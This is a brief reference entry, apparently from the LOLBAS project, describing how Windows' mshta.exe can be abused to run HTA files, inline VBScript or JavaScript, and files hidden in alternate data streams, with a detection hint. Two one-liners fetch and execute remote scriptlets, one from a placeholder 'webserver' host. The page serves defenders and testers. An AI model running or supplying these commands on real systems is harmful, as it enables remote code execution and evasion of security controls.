Used by Windows to execute html applications. (.hta)

Paths:

C:\Windows\System32\mshta.exe
C:\Windows\SysWOW64\mshta.exe

Detection: mshta.exe executing raw or obfuscated script within the command-line Usage of HTA file

Execute

Opens the target .HTA and executes embedded JavaScript, JScript, or VBScript.

mshta.exe evilfile.hta

Executes VBScript supplied as a command line argument.

mshta.exe vbscript:Close(Execute("GetObject(""script:https[:]//webserver/payload[.]sct"")"))

Executes JavaScript supplied as a command line argument.

mshta.exe javascript:a=GetObject("script:https://raw.githubusercontent.com/LOLBAS-Project/LOLBAS/master/OSBinaries/Payload/Mshta_calc.sct").Exec();close();

Alternate data streams

Opens the target .HTA and executes embedded JavaScript, JScript, or VBScript.

mshta.exe "C:\ads\file.txt:file.hta"